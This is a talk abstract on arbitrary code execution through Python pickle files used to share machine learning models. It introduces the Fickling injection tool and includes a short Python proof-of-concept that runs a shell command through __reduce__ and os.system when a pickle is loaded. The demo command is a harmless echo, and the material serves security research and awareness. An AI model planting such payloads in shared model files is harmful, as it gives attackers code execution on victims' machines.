Machine learning models are often stored as Python pickle files because they conserve memory, enable start-and-stop model training, and can be easily shared. However, deserializing a pickle file from an untrusted source can result in arbitrary code execution. This talk covers our research on model-sharing services like PyTorch Hub and introduces Fickling, our open-source decompiler and code-injection tool. Fickling allows penetration testers and red teamers to create malicious model files that can attack machine learning frameworks like PyTorch and spaCy. We will demonstrate the wide variety of attacks made possible by the inherently vulnerable design of pickle files.
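The core issue is that unpickling is not just data loading: the pickle format can instruct the interpreter to call arbitrary callables during deserialization. Below is a minimal sketch of that behavior using only the Python standard library; the MaliciousPayload class name and the echo command are illustrative and are not part of Fickling or any framework API.

```python
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # __reduce__ returns a (callable, args) pair that pickle records in the
        # serialized stream; pickle.loads() invokes it during deserialization.
        return (os.system, ("echo 'arbitrary code executed during unpickling'",))

# An attacker serializes the payload and distributes it as a "model file".
payload_bytes = pickle.dumps(MaliciousPayload())

# A victim who simply loads the file runs the attacker's command.
pickle.loads(payload_bytes)
```

Fickling performs a comparable injection directly at the pickle opcode level, so a malicious model file does not need any cooperating class definition in the victim's environment.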
Authored by
- Carson Harmon, Evan Sultanik, Jim Miller, Suha Hussain